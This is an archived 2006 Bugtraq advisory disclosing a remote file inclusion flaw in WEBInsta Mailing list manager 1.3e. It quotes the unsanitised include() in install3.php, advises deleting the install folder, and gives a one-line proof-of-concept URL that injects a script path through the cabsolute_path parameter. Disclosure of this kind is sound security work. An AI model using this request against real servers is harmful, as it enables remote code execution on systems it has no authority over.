| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 10 Aug 2006 21:07:46 -0000
From: philipp.niedziela@....de
To: bugtraq@...urityfocus.com
Subject: WEBInsta Mailing list manager (cabsolute_path) 1.3e RFI
+--------------------------------------------------------------------
+
+ WEBInsta Mailing list manager (cabsolute_path) 1.3e RFI
+
+ Original advisory:
+ http://www.bb-pcsecurity.de/Websecurity/311/org/+ WEBInsta_Mailing_list_manager_(cabsolute_path)_1.3e_RFI.htm
+
+--------------------------------------------------------------------
+
+ Affected Software .: WEBInsta™ Mailing list manager 1.3e
+ Venedor ...........: http://www.webinsta.com
+ Class .............: Remote File Inclusion
+ Risk ..............: high (Remote File Execution)
+ Found by ..........: Philipp Niedziela
+ Contact ...........: webmaster[at]bb-pcsecurity[.]de
+
+--------------------------------------------------------------------
+
+ Code /istall/install3.php:
+
+ .....
+ if($database=="none")
+ {
+ include($cabsolute_path.'inc/adodbt/db.inc');
+ $conn = &ADONewConnection();
+ .....
+
+--------------------------------------------------------------------
+
+ $cabsolute_path is not properly sanitized before being used
+
+--------------------------------------------------------------------
+
+ Solution:
+ Delete folder "install" after installation!!
+
+--------------------------------------------------------------------
+
+ PoC:
+
+ http://[target]/install/install3.php?database=none&cabsolute_path=[script]
+
+--------------------------------------------------------------------
+
+ Greets: /str0ke
+
+-------------------------[ E O F ]----------------------------------
Powered by blists - more mailing lists